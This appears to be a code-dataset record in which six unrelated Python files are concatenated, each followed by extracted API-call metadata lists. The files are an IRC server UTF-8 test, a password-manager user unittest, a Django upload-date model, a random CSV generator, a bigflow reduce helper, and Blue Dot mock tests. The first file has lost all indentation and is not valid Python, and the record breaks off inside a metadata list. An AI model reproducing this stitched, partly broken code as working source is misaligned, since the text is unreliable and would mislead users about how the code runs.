class Utf8TestCase(cases.BaseServerTestCase):
@cases.mark_specifications("Ergo")
def testUtf8Validation(self):
self.connectClient(
"bar",
capabilities=["batch", "echo-message", "labeled-response"],
)
self.joinChannel(1, "#qux")
self.sendLine(1, "PRIVMSG #qux hi")
ms = self.getMessages(1)
self.assertMessageMatch(
[m for m in ms if m.command == "PRIVMSG"][0], params=["#qux", "hi"]
)
self.sendLine(1, b"PRIVMSG #qux hi\xaa")
self.assertMessageMatch(
self.getMessage(1),
command="FAIL",
params=["PRIVMSG", "INVALID_UTF8", ANYSTR],
tags={},
)
self.sendLine(1, b"@label=xyz PRIVMSG #qux hi\xaa")
self.assertMessageMatch(
self.getMessage(1),
command="FAIL",
params=["PRIVMSG", "INVALID_UTF8", ANYSTR],
tags={"label": "xyz"},
)
| [
"irctest.cases.mark_specifications"
] | [((287, 320), 'irctest.cases.mark_specifications', 'cases.mark_specifications', (['"""Ergo"""'], {}), "('Ergo')\n", (312, 320), False, 'from irctest import cases\n')] |
import unittest
from user import User
import pyperclip
class TestUser(unittest.TestCase):
"""
Test class that defines test cases for the user class behaviours.
Args:
unittest.TestCase: TestCase class that helps in creating test cases
"""
def tearDown(self):
"""
It resets the user_list array(cleans up)
"""
User.user_list = []
def setUp(self):
"""
It creates a test User
"""
self.new_user = User("Danlon", "Situma", "<PASSWORD>", "<PASSWORD>")
def test_init(self):
"""
Test case to test if the object id initialized properly
"""
self.assertEqual(self.new_user.first_name, "Danlon")
self.assertEqual(self.new_user.last_name, "Situma")
self.assertEqual(self.new_user.user_name, "Dasi202")
self.assertEqual(self.new_user.password, "<PASSWORD>")
def test_save_user(self):
"""
Test case to test if the user object is saved into the user list
"""
self.new_user.save_user()
self.assertEqual(len(User.user_list), 1)
def test_save_multiple_user(self):
"""
Test case to check if we can save multiple user objects to the user list
"""
self.new_user.save_user()
test_user = User("Test", "user", "test", "walIas15")
test_user.save_user()
self.assertEqual(len(User.user_list), 2)
def test_find_user_by_username(self):
"""
Test case to check if we can find a user by user name and display information
"""
self.new_user.save_user()
test_user = User("Test", "user", "test", "walIas15")
test_user.save_user()
user_exists = User.user_exist("test")
self.assertTrue(user_exists)
def test_check_user(self):
"""
Test case to check for the user
"""
self.new_user.save_user()
test_user = User("Test", "user", "test", "walIas15")
test_user.save_user()
test_user.check_user("test", "walIas15")
if __name__ == '__main__':
    unittest.main()
| [
"unittest.main",
"user.User.user_exist",
"user.User"
] | [((2100, 2115), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2113, 2115), False, 'import unittest\n'), ((494, 546), 'user.User', 'User', (['"""Danlon"""', '"""Situma"""', '"""<PASSWORD>"""', '"""<PASSWORD>"""'], {}), "('Danlon', 'Situma', '<PASSWORD>', '<PASSWORD>')\n", (498, 546), False, 'from user import User\n'), ((1317, 1357), 'user.User', 'User', (['"""Test"""', '"""user"""', '"""test"""', '"""walIas15"""'], {}), "('Test', 'user', 'test', 'walIas15')\n", (1321, 1357), False, 'from user import User\n'), ((1644, 1684), 'user.User', 'User', (['"""Test"""', '"""user"""', '"""test"""', '"""walIas15"""'], {}), "('Test', 'user', 'test', 'walIas15')\n", (1648, 1684), False, 'from user import User\n'), ((1737, 1760), 'user.User.user_exist', 'User.user_exist', (['"""test"""'], {}), "('test')\n", (1752, 1760), False, 'from user import User\n'), ((1948, 1988), 'user.User', 'User', (['"""Test"""', '"""user"""', '"""test"""', '"""walIas15"""'], {}), "('Test', 'user', 'test', 'walIas15')\n", (1952, 1988), False, 'from user import User\n')] |
from django.db import models
from auditable.models import Auditable
class IcbcUploadDate(Auditable):
upload_date = models.DateField(
blank=False,
db_comment="the date the icbc data is current to",
null=False,
auto_now=False)
class Meta:
db_table = 'icbc_upload_date'
db_table_comment = "contains a record for each time that the icbc file is \
uploaded, with the date current to as specified by the user"
| [
"django.db.models.DateField"
] | [((121, 234), 'django.db.models.DateField', 'models.DateField', ([], {'blank': '(False)', 'db_comment': '"""the date the icbc data is current to"""', 'null': '(False)', 'auto_now': '(False)'}), "(blank=False, db_comment=\n 'the date the icbc data is current to', null=False, auto_now=False)\n", (137, 234), False, 'from django.db import models\n')] |
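A usage sketch for this model — standard manager calls only, and it assumes the `Auditable` base class adds no required fields without defaults:

# --- usage sketch: record today's upload and read back the most recent one ---
import datetime

IcbcUploadDate.objects.create(upload_date=datetime.date.today())
latest = IcbcUploadDate.objects.order_by('-upload_date').first()
# --- end sketch ---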
import csv
import random
# csvData = [['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K']]
# for x in range(5000):
# b = random.randint(0, 50)
# c = random.randint(0, 5)
# d = random.randint(-20, 20)
# elem = [x, b, c, d, 2*x, x+b, b+c, x+b+c, b*c*x*2, b*c, b > 20]
# for x in range(11):
# elem[x] = str(elem[x])
# csvData.append(elem)
# with open('example_1', 'w') as csvFile:
# writer = csv.writer(csvFile)
# writer.writerows(csvData)
# csvFile.close()
# csvData = [['A', 'B', 'C', 'D', 'E', 'F', 'G']]
# for x in range(5000):
# b = random.randint(0, 25)
# c = random.randint(0, 3)
# d = random.randint(-10, 20)
# elem = [x, b, c, d, c != 1, b+c, b+c+d]
# for x in range(7):
# elem[x] = str(elem[x])
# csvData.append(elem)
# with open('example_2', 'w') as csvFile:
# writer = csv.writer(csvFile)
# writer.writerows(csvData)
# csvFile.close()
# csvData = [['A', 'B', 'C', 'D', 'E', 'F', 'G']]
# for x in range(100000):
# b = random.randint(0, 25)
# c = random.randint(0, 3)
# d = random.randint(-10, 20)
# elem = [x, b, c, d, c != 1, b<10, c+d]
# for x in range(7):
# elem[x] = str(elem[x])
# csvData.append(elem)
# with open('example_3', 'w') as csvFile:
# writer = csv.writer(csvFile)
# writer.writerows(csvData)
# csvFile.close()
# csvData = [['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L']]
# for x in range(400000):
# b = random.randint(0, 25)
# c = random.randint(0, 3)
# d = random.randint(-10, 20)
# elem = [x, b, c, d, c != 1, b<10, c+d, b < 20, c != 1 and b < 20, d+b+c, b*d, b*c*d]
# for x in range(7):
# elem[x] = str(elem[x])
# csvData.append(elem)
# with open('example_4', 'w') as csvFile:
# writer = csv.writer(csvFile)
# writer.writerows(csvData)
# csvFile.close()
# csvData = [['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N']]
# for x in range(400000):
# b = random.randint(0, 25)
# c = random.randint(0, 3)
# d = random.randint(-10, 20)
# elem = [x, b, c, d, c != 1, b<10, c+d, b < 20, c != 1 and b < 20, d+b+c, b*d, b*c*d, b*c, c%2 == 0]
# for x in range(14):
# elem[x] = str(elem[x])
# csvData.append(elem)
# with open('example_5', 'w') as csvFile:
# writer = csv.writer(csvFile)
# writer.writerows(csvData)
# csvFile.close()
# csvData = [['A', 'B', 'C', 'D', 'E', 'F', 'G']]
# for x in range(400000):
# a = random.randint(0, 25)
# b = random.randint(0, 3)
# c = random.randint(-10, 20)
# d = a + b <= 5
# e = (a + c)%8
# f = random.randint(0, 200)
# g = f <= 80
# elem = [a, b, c, d, e, f, g]
# for x in range(7):
# elem[x] = str(elem[x])
# csvData.append(elem)
# with open('example_norm', 'w') as csvFile:
# writer = csv.writer(csvFile)
# writer.writerows(csvData)
# csvFile.close()
csvData = [['A', 'B', 'C', 'D', 'E', 'F']]
for x in range(400000):
a = random.randint(0, 25)
b = random.randint(0, 3)
c = random.randint(-10, 20)
d = a <= 15 and b >= 2
e = a + b
f = a + b + c >= 15
elem = [a, b, c, d, e, f]
for x in range(6):
elem[x] = str(elem[x])
csvData.append(elem)
with open('example_make_index', 'w') as csvFile:
writer = csv.writer(csvFile)
writer.writerows(csvData)
csvFile.close()
| [
"csv.writer",
"random.randint"
] | [((3005, 3026), 'random.randint', 'random.randint', (['(0)', '(25)'], {}), '(0, 25)\n', (3019, 3026), False, 'import random\n'), ((3035, 3055), 'random.randint', 'random.randint', (['(0)', '(3)'], {}), '(0, 3)\n', (3049, 3055), False, 'import random\n'), ((3064, 3087), 'random.randint', 'random.randint', (['(-10)', '(20)'], {}), '(-10, 20)\n', (3078, 3087), False, 'import random\n'), ((3325, 3344), 'csv.writer', 'csv.writer', (['csvFile'], {}), '(csvFile)\n', (3335, 3344), False, 'import csv\n')] |
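Every value in the generated file was written as a string, so on read-back the derived columns come out as literals such as 'True'/'False' and need explicit conversion. A small sanity-check sketch over the 'example_make_index' file produced above:

# --- read-back sanity check for the file written above ---
import csv

with open('example_make_index', newline='') as f:
    for row in csv.DictReader(f):
        a, b, c = int(row['A']), int(row['B']), int(row['C'])
        assert (row['D'] == 'True') == (a <= 15 and b >= 2)   # D was written as str(a <= 15 and b >= 2)
        assert int(row['E']) == a + b
        assert (row['F'] == 'True') == (a + b + c >= 15)
# --- end sketch ---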
#
# Copyright (c) 2015 Baidu, Inc. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Script Definition
"""
import math
from bigflow import pobject
from bigflow.core import entity
from bigflow.util import side_input_util
from bigflow.util import utils
def reduce(ptype, fn, *side_inputs, **kargs):
"""
inner fun
"""
if utils.is_infinite(ptype):
raise ValueError("reduce not supported infinite PType")
scale = kargs.get('scale', 0.1)
partial_scale = math.sqrt(scale)
size = kargs.get('output_size', None)
if size is None:
partial_size = None
else:
partial_size = ptype.node().size() * math.sqrt(size / ptype.node().size())
memory = kargs.get('memory_limit', -1)
cpu = kargs.get('cpu_limit', -1)
objector = kargs.get('serde', ptype.serde()) # use the same serde of the input
side_inputs = side_input_util.SideInputsUtil.get_dealt_side_inputs_tuple(side_inputs)
partial_helper = side_input_util.SideInputsUtil(ptype, side_inputs)
partial_node = partial_helper.process_with_side_inputs()\
.by(entity.ReduceProcessor(fn).set_side_inputs(*side_inputs))\
.as_type(objector)\
.set_debug_info("ReducePartial: " + repr(fn)) \
.set_effective_key_num(0) \
.input(-1).allow_partial_processing().done() \
.set_size(partial_size, partial_scale) \
.set_memory(memory) \
.set_cpu(cpu)
non_partial_helper = side_input_util.SideInputsUtil(partial_node, side_inputs)
non_partial_node = non_partial_helper.process_with_side_inputs()\
.by(entity.ReduceProcessor(fn).set_side_inputs(*side_inputs))\
.as_type(objector)\
.set_debug_info("Reduce: " + repr(fn)) \
.set_effective_key_num(0) \
.set_size(size, partial_scale) \
.set_memory(memory) \
.set_cpu(cpu)
return pobject.PObject(non_partial_node, ptype.pipeline())
| [
"math.sqrt",
"bigflow.util.side_input_util.SideInputsUtil.get_dealt_side_inputs_tuple",
"bigflow.util.utils.is_infinite",
"bigflow.util.side_input_util.SideInputsUtil",
"bigflow.core.entity.ReduceProcessor"
] | [((860, 884), 'bigflow.util.utils.is_infinite', 'utils.is_infinite', (['ptype'], {}), '(ptype)\n', (877, 884), False, 'from bigflow.util import utils\n'), ((1007, 1023), 'math.sqrt', 'math.sqrt', (['scale'], {}), '(scale)\n', (1016, 1023), False, 'import math\n'), ((1390, 1461), 'bigflow.util.side_input_util.SideInputsUtil.get_dealt_side_inputs_tuple', 'side_input_util.SideInputsUtil.get_dealt_side_inputs_tuple', (['side_inputs'], {}), '(side_inputs)\n', (1448, 1461), False, 'from bigflow.util import side_input_util\n'), ((1483, 1533), 'bigflow.util.side_input_util.SideInputsUtil', 'side_input_util.SideInputsUtil', (['ptype', 'side_inputs'], {}), '(ptype, side_inputs)\n', (1513, 1533), False, 'from bigflow.util import side_input_util\n'), ((1970, 2027), 'bigflow.util.side_input_util.SideInputsUtil', 'side_input_util.SideInputsUtil', (['partial_node', 'side_inputs'], {}), '(partial_node, side_inputs)\n', (2000, 2027), False, 'from bigflow.util import side_input_util\n'), ((2111, 2137), 'bigflow.core.entity.ReduceProcessor', 'entity.ReduceProcessor', (['fn'], {}), '(fn)\n', (2133, 2137), False, 'from bigflow.core import entity\n'), ((1609, 1635), 'bigflow.core.entity.ReduceProcessor', 'entity.ReduceProcessor', (['fn'], {}), '(fn)\n', (1631, 1635), False, 'from bigflow.core import entity\n')] |
import pytest
from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation
from bluedot.exceptions import ButtonDoesNotExist
from time import sleep
from threading import Event, Thread
def test_default_values():
mbd = MockBlueDot()
assert mbd.device == "hci0"
assert mbd.port == 1
assert mbd.running
assert mbd.cols == 1
assert mbd.rows == 1
assert mbd.print_messages
assert mbd.double_press_time == 0.3
assert mbd.rotation_segments == 8
assert mbd.when_client_connects == None
assert mbd.when_client_disconnects == None
assert mbd.when_pressed == None
assert mbd.when_double_pressed == None
assert mbd.when_moved == None
assert mbd.when_released == None
assert mbd.when_swiped == None
assert len(mbd.buttons) == 1
def test_modify_values():
mbd = MockBlueDot(device = "hci1", port = 2, auto_start_server = False, print_messages = False, cols = 3, rows = 2)
assert mbd.device == "hci1"
assert mbd.port == 2
assert not mbd.running
assert mbd.cols == 3
assert mbd.rows == 2
assert not mbd.print_messages
mbd.print_messages = True
assert mbd.print_messages
assert mbd.double_press_time == 0.3
mbd.double_press_time = 0.4
assert mbd.double_press_time == 0.4
assert mbd.rotation_segments == 8
mbd.rotation_segments = 16
assert mbd.rotation_segments == 16
assert len(mbd.buttons) == 6
def test_start_stop():
mbd = MockBlueDot(auto_start_server = False)
assert not mbd.running
mbd.start()
assert mbd.running
mbd.stop()
assert not mbd.running
def test_connect_disconnect():
mbd = MockBlueDot()
assert not mbd.is_connected
mbd.mock_client_connected()
assert mbd.wait_for_connection(1)
assert mbd.is_connected
mbd.mock_client_disconnected()
assert not mbd.is_connected
def test_when_connect_disconnect():
mbd = MockBlueDot()
event_connect = Event()
mbd.when_client_connects = lambda: event_connect.set()
event_disconnect = Event()
mbd.when_client_disconnects = lambda: event_disconnect.set()
assert not event_connect.is_set()
mbd.mock_client_connected()
assert event_connect.wait(1)
assert not event_disconnect.is_set()
mbd.mock_client_disconnected()
assert event_disconnect.wait(1)
def test_when_connect_disconnect_background():
mbd = MockBlueDot()
event_connect = Event()
mbd.set_when_client_connects(lambda: delay_function(event_connect.set, 0.2), background=True)
event_disconnect = Event()
mbd.set_when_client_disconnects(lambda: delay_function(event_disconnect.set, 0.2), background=True)
mbd.when_client_disconnects = lambda: event_disconnect.set()
assert not event_connect.is_set()
mbd.mock_client_connected()
assert not event_connect.is_set()
assert event_connect.wait(1)
assert not event_disconnect.is_set()
mbd.mock_client_disconnected()
assert not event_disconnect.is_set()
assert event_disconnect.wait(1)
def test_resize():
mbd = MockBlueDot()
mbd.resize(4,3)
assert mbd.cols == 4
assert mbd.rows == 3
assert len(mbd.buttons) == 12
def test_pressed_moved_released():
mbd = MockBlueDot()
mbd.mock_client_connected()
def pressed_moved_released(dot, col, row):
#initial value
assert not mbd.is_pressed
assert dot.value == 0
#pressed
mbd.mock_blue_dot_pressed(col,row,0,0)
assert dot.is_pressed
assert dot.value == 1
#released
mbd.mock_blue_dot_released(col,row,0,0)
assert not dot.is_pressed
assert dot.value == 0
#wait_for_press
delay_function(lambda: mbd.mock_blue_dot_pressed(col,row,0,0), 0.5)
assert dot.wait_for_press(1)
assert not dot.wait_for_release(0)
#wait_for_release
delay_function(lambda: mbd.mock_blue_dot_released(col,row,0,0), 0.5)
assert dot.wait_for_release(1)
assert not dot.wait_for_press(0)
def not_pressed(dot, col, row):
assert not dot.is_pressed
assert not dot.value == 1
mbd.mock_blue_dot_pressed(col,row,0,0)
assert not dot.is_pressed
assert not dot.value == 1
# single button
pressed_moved_released(mbd, 0, 0)
pressed_moved_released(mbd[0,0], 0, 0)
# resize to 2 buttons
mbd.resize(2, 1)
# test second button and main
pressed_moved_released(mbd, 1, 0)
pressed_moved_released(mbd[1,0], 1, 0)
# test second button isn't pressed by first
not_pressed(mbd[1,0], 0, 0)
def test_double_press():
mbd = MockBlueDot()
mbd.mock_client_connected()
def simulate_double_press(col, row):
#sleep longer than the double press time, to clear any past double presses!
sleep(mbd.double_press_time + 0.1)
mbd.mock_blue_dot_pressed(col,row,0,0)
mbd.mock_blue_dot_released(col,row,0,0)
mbd.mock_blue_dot_pressed(col,row,0,0)
mbd.mock_blue_dot_released(col,row,0,0)
def simulate_failed_double_press(col, row):
sleep(mbd.double_press_time + 0.1)
mbd.mock_blue_dot_pressed(col,row,0,0)
mbd.mock_blue_dot_released(col,row,0,0)
sleep(mbd.double_press_time + 0.1)
mbd.mock_blue_dot_pressed(col,row,0,0)
mbd.mock_blue_dot_released(col,row,0,0)
def double_press(dot, col, row):
# when_double_pressed
event_double_pressed = Event()
dot.when_double_pressed = lambda: event_double_pressed.set()
simulate_failed_double_press(col, row)
assert not event_double_pressed.is_set()
simulate_double_press(col, row)
assert event_double_pressed.is_set()
# wait for double press
# double press the blue dot
delay_function(lambda: simulate_double_press(col, row), 0.2)
# wait for double press
assert dot.wait_for_double_press(1)
# dont double press the blue dot
delay_function(lambda: simulate_failed_double_press(col, row), 0.2)
assert not dot.wait_for_double_press(1)
def not_double_press(dot, col, row):
# when_double_pressed
event_double_pressed = Event()
dot.when_double_pressed = lambda: event_double_pressed.set()
simulate_double_press(col, row)
assert not event_double_pressed.is_set()
# single button
double_press(mbd, 0, 0)
double_press(mbd[0,0], 0, 0)
mbd.resize(2, 1)
# two buttons
double_press(mbd, 1, 0)
double_press(mbd[1,0], 1, 0)
# first button doesnt double press second button
not_double_press(mbd[1,0], 0, 0)
def test_when_pressed_moved_released():
mbd = MockBlueDot()
mbd.mock_client_connected()
def when_pressed_moved_released(dot, col, row):
#when_pressed
event_pressed = Event()
dot.when_pressed = lambda: event_pressed.set()
#when_double_pressed
event_double_pressed = Event()
dot.when_double_pressed = lambda: event_double_pressed.set()
#when_moved
event_moved = Event()
dot.when_moved = lambda: event_moved.set()
#when_released
event_released = Event()
dot.when_released = lambda: event_released.set()
assert not event_pressed.is_set()
mbd.mock_blue_dot_pressed(col,row,0,0)
assert event_pressed.is_set()
assert not event_moved.is_set()
mbd.mock_blue_dot_moved(col,row,1,1)
assert event_moved.is_set()
assert not event_released.is_set()
mbd.mock_blue_dot_released(col,row,0,0)
assert event_released.is_set()
assert not event_double_pressed.is_set()
mbd.mock_blue_dot_pressed(col,row,0,0)
assert event_double_pressed.is_set()
when_pressed_moved_released(mbd, 0, 0)
when_pressed_moved_released(mbd[0,0], 0, 0)
mbd.resize(2,1)
when_pressed_moved_released(mbd, 1, 0)
when_pressed_moved_released(mbd[1,0], 1, 0)
def test_when_pressed_moved_released_background():
mbd = MockBlueDot()
mbd.mock_client_connected()
def when_pressed_moved_released_background(dot, col, row):
#when_pressed
event_pressed = Event()
dot.set_when_pressed(lambda: delay_function(event_pressed.set, 0.2), background=True)
#when_double_pressed
event_double_pressed = Event()
dot.set_when_double_pressed(lambda: delay_function(event_double_pressed.set, 0.2), background=True)
#when_moved
event_moved = Event()
dot.set_when_moved(lambda: delay_function(event_moved.set, 0.2), background=True)
#when_released
event_released = Event()
dot.set_when_released(lambda: delay_function(event_released.set, 0.2), background=True)
# test that the events dont block
assert not event_pressed.is_set()
mbd.mock_blue_dot_pressed(col,row,0,0)
assert not event_pressed.is_set()
assert event_pressed.wait(1)
assert not event_moved.is_set()
mbd.mock_blue_dot_moved(col,row,1,1)
assert not event_moved.is_set()
assert event_moved.wait(1)
assert not event_released.is_set()
mbd.mock_blue_dot_released(col,row,0,0)
assert not event_released.is_set()
assert event_released.wait(1)
# set pressed, moved, released to None so they dont wait
mbd.set_when_pressed(None)
mbd.set_when_moved(None)
mbd.set_when_released(None)
mbd.mock_blue_dot_pressed(col,row,0,0)
mbd.mock_blue_dot_moved(col,row,1,1)
mbd.mock_blue_dot_released(col,row,0,0)
assert not event_double_pressed.is_set()
mbd.mock_blue_dot_pressed(col,row,0,0)
assert not event_double_pressed.is_set()
assert event_double_pressed.wait(1)
when_pressed_moved_released_background(mbd, 0, 0)
when_pressed_moved_released_background(mbd[0,0], 0, 0)
mbd.resize(2,1)
when_pressed_moved_released_background(mbd, 1, 0)
when_pressed_moved_released_background(mbd[1,0], 1, 0)
def test_position():
mbd = MockBlueDot()
mbd.mock_client_connected()
def position(dot, col, row):
mbd.mock_blue_dot_pressed(col,row,0,0)
assert not mbd.position.top
assert mbd.position.middle
assert not mbd.position.bottom
assert not mbd.position.left
assert not mbd.position.right
mbd.mock_blue_dot_moved(col,row,1,0)
assert not mbd.position.top
assert not mbd.position.middle
assert not mbd.position.bottom
assert not mbd.position.left
assert mbd.position.right
mbd.mock_blue_dot_moved(col,row,-1,0)
assert not mbd.position.top
assert not mbd.position.middle
assert not mbd.position.bottom
assert mbd.position.left
assert not mbd.position.right
mbd.mock_blue_dot_moved(col,row,0,1)
assert mbd.position.top
assert not mbd.position.middle
assert not mbd.position.bottom
assert not mbd.position.left
assert not mbd.position.right
mbd.mock_blue_dot_moved(col,row,0,-1)
assert not mbd.position.top
assert not mbd.position.middle
assert mbd.position.bottom
assert not mbd.position.left
assert not mbd.position.right
mbd.mock_blue_dot_moved(col,row,0.1234, -0.4567)
assert mbd.position.x == 0.1234
assert mbd.position.y == -0.4567
mbd.mock_blue_dot_moved(col,row,1, 0)
assert mbd.position.distance == 1
assert mbd.position.angle == 90
position(mbd, 0, 0)
position(mbd[0,0], 0, 0)
mbd.resize(2,1)
position(mbd[1,0], 1, 0)
def test_interaction():
mbd = MockBlueDot()
mbd.mock_client_connected()
def interaction(dot, col, row):
assert dot.interaction == None
mbd.mock_blue_dot_pressed(col,row,-1,0)
assert dot.interaction.active
assert len(dot.interaction.positions) == 1
assert dot.interaction.distance == 0
assert dot.interaction.pressed_position.x == -1
assert dot.interaction.pressed_position.y == 0
assert dot.interaction.current_position.x == -1
assert dot.interaction.current_position.y == 0
assert dot.interaction.previous_position == None
assert dot.interaction.released_position == None
mbd.mock_blue_dot_moved(col,row,0,0)
assert dot.interaction.active
assert len(dot.interaction.positions) == 2
assert dot.interaction.distance == 1
assert dot.interaction.pressed_position.x == -1
assert dot.interaction.pressed_position.y == 0
assert dot.interaction.current_position.x == 0
assert dot.interaction.current_position.y == 0
assert dot.interaction.previous_position.x == -1
assert dot.interaction.previous_position.y == 0
assert dot.interaction.released_position == None
mbd.mock_blue_dot_released(col,row,1,0)
assert not dot.interaction.active
assert len(dot.interaction.positions) == 3
assert dot.interaction.distance == 2
assert dot.interaction.pressed_position.x == -1
assert dot.interaction.pressed_position.y == 0
assert dot.interaction.current_position.x == 1
assert dot.interaction.current_position.y == 0
assert dot.interaction.previous_position.x == 0
assert dot.interaction.previous_position.y == 0
assert dot.interaction.released_position.x == 1
assert dot.interaction.released_position.y == 0
interaction(mbd[0,0], 0, 0)
mbd.resize(2,1)
interaction(mbd[1,0], 1, 0)
def test_swipe():
mbd = MockBlueDot()
mbd.mock_client_connected()
def swipe(dot, col, row):
def simulate_swipe(
col, row,
pressed_x, pressed_y,
moved_x, moved_y,
released_x, released_y):
mbd.mock_blue_dot_pressed(col,row,pressed_x, pressed_y)
mbd.mock_blue_dot_moved(col,row,moved_x, moved_y)
mbd.mock_blue_dot_released(col,row,released_x, released_y)
#wait_for_swipe
delay_function(lambda: simulate_swipe(col,row,-1,0,0,0,1,0), 0.5)
assert dot.wait_for_swipe(1)
#when_swiped
event_swiped = Event()
dot.when_swiped = lambda: event_swiped.set()
assert not event_swiped.is_set()
#simulate swipe left to right
simulate_swipe(col,row,-1,0,0,0,1,0)
#check event
assert event_swiped.is_set()
#get the swipe
swipe = BlueDotSwipe(mbd[col, row].interaction)
assert swipe.right
assert not swipe.left
assert not swipe.up
assert not swipe.down
#right to left
event_swiped.clear()
simulate_swipe(col,row,1,0,0,0,-1,0)
assert event_swiped.is_set()
swipe = BlueDotSwipe(mbd[col, row].interaction)
assert not swipe.right
assert swipe.left
assert not swipe.up
assert not swipe.down
#bottom to top
event_swiped.clear()
simulate_swipe(col,row,0,-1,0,0,0,1)
assert event_swiped.is_set()
swipe = BlueDotSwipe(mbd[col, row].interaction)
assert not swipe.right
assert not swipe.left
assert swipe.up
assert not swipe.down
#top to bottom
event_swiped.clear()
simulate_swipe(col,row,0,1,0,0,0,-1)
assert event_swiped.is_set()
swipe = BlueDotSwipe(mbd[col, row].interaction)
assert not swipe.right
assert not swipe.left
assert not swipe.up
assert swipe.down
# background
event_swiped.clear()
dot.set_when_swiped(lambda: delay_function(event_swiped.set, 0.2), background=True)
simulate_swipe(col,row,0,1,0,0,0,-1)
assert not event_swiped.is_set()
assert event_swiped.wait(1)
swipe(mbd, 0, 0)
swipe(mbd[0,0], 0, 0)
mbd.resize(2,1)
swipe(mbd, 1, 0)
swipe(mbd[1,0], 1, 0)
def test_callback_in_class():
class CallbackClass():
def __init__(self):
self.event = Event()
def no_pos(self):
self.event.set()
self.pos = None
def with_pos(self, pos):
self.event.set()
self.pos = pos
cc = CallbackClass()
mbd = MockBlueDot()
mbd.mock_client_connected()
mbd.when_pressed = cc.no_pos
mbd.mock_blue_dot_pressed(0,0,0,0)
assert cc.event.is_set()
assert cc.pos is None
mbd.mock_blue_dot_released(0,0,0,0)
cc.event.clear()
mbd.when_pressed = cc.with_pos
mbd.mock_blue_dot_pressed(0,0,0,0)
assert cc.event.is_set()
assert cc.pos.middle
def test_rotation():
mbd = MockBlueDot()
mbd.mock_client_connected()
def rotation(dot, col, row):
event_rotated = Event()
dot.when_rotated = lambda: event_rotated.set()
assert not event_rotated.is_set()
#press the blue dot, no rotation
mbd.mock_blue_dot_pressed(col,row,-0.1,1)
assert not event_rotated.is_set()
r = BlueDotRotation(mbd[col,row].interaction, mbd[0,0].rotation_segments)
assert not r.valid
assert r.value == 0
assert not r.clockwise
assert not r.anti_clockwise
#rotate clockwise
event_rotated.clear()
mbd.mock_blue_dot_moved(col,row,0.1,1)
assert event_rotated.is_set()
r = BlueDotRotation(mbd[col,row].interaction, mbd[col,row].rotation_segments)
assert r.value == 1
assert r.valid
assert r.clockwise
assert not r.anti_clockwise
#rotate anti-clockwise
event_rotated.clear()
mbd.mock_blue_dot_moved(col,row,-0.1,1)
assert event_rotated.is_set()
r = BlueDotRotation(mbd[col,row].interaction, mbd[col,row].rotation_segments)
assert r.value == -1
assert r.valid
assert not r.clockwise
assert r.anti_clockwise
# background
# rotate clockwise again
event_rotated.clear()
dot.set_when_rotated(lambda: delay_function(event_rotated.set, 0.2), background=True)
mbd.mock_blue_dot_moved(col,row,0.1,1)
assert not event_rotated.is_set()
assert event_rotated.wait(1)
rotation(mbd, 0, 0)
rotation(mbd[0,0], 0, 0)
mbd.resize(2,1)
rotation(mbd, 1, 0)
rotation(mbd[1,0], 1, 0)
def test_button_does_not_exist():
mbd = MockBlueDot()
with pytest.raises(ButtonDoesNotExist):
button = mbd[0,1]
def test_allow_pairing():
mbd = MockBlueDot()
assert not mbd.adapter.discoverable
assert not mbd.adapter.pairable
mbd.allow_pairing()
assert mbd.adapter.discoverable
assert mbd.adapter.pairable
def test_dot_appearance():
mbd = MockBlueDot()
assert mbd.color == "blue"
assert mbd.border == False
assert mbd.square == False
assert mbd.visible == True
mbd.resize(2,1)
for button in mbd.buttons:
assert button.color == "blue"
assert button.border == False
assert button.square == False
assert button.visible == True
mbd[1,0].color = "red"
mbd[1,0].border = True
mbd[1,0].square = True
mbd[1,0].visible = False
assert mbd.color == "blue"
assert mbd.border == False
assert mbd.square == False
assert mbd.visible == True
assert mbd[0,0].color == "blue"
assert mbd[0,0].border == False
assert mbd[0,0].square == False
assert mbd[0,0].visible == True
assert mbd[1,0].color == "red"
assert mbd[1,0].border == True
assert mbd[1,0].square == True
assert mbd[1,0].visible == False
mbd.color = "red"
mbd.border = True
mbd.square = True
mbd.visible = False
assert mbd.color == "red"
assert mbd.border == True
assert mbd.square == True
assert mbd.visible == False
assert mbd[0,0].color == "red"
assert mbd[0,0].border == True
assert mbd[0,0].square == True
assert mbd[0,0].visible == False
def test_dot_colors():
from bluedot.colors import BLUE, RED, GREEN, YELLOW
mbd = MockBlueDot()
assert mbd.color == "blue"
assert mbd.color == (0,0,255)
assert mbd.color == BLUE
assert mbd.color == "#0000ff"
assert mbd.color == "#0000ffff"
mbd.color = RED
assert mbd.color == (255,0,0)
assert mbd.color == "red"
assert mbd.color == "#ff0000"
assert mbd.color == "#ff0000ff"
mbd.color = "green"
assert mbd.color == GREEN
assert mbd.color == (0,128,0)
assert mbd.color == "#008000"
assert mbd.color == "#008000ff"
mbd.color = "#ffff00"
assert mbd.color == YELLOW
assert mbd.color == "yellow"
assert mbd.color == (255,255,0)
assert mbd.color == "#ffff00ff"
mbd.color = "#ffffff11"
assert mbd.color == "#ffffff11"
def delay_function(func, time):
delayed_thread = Thread(target = _delayed_function, args = (func, time))
delayed_thread.start()
def _delayed_function(func, time):
sleep(time)
func() | [
"bluedot.BlueDotRotation",
"time.sleep",
"threading.Event",
"bluedot.MockBlueDot",
"bluedot.BlueDotSwipe",
"pytest.raises",
"threading.Thread"
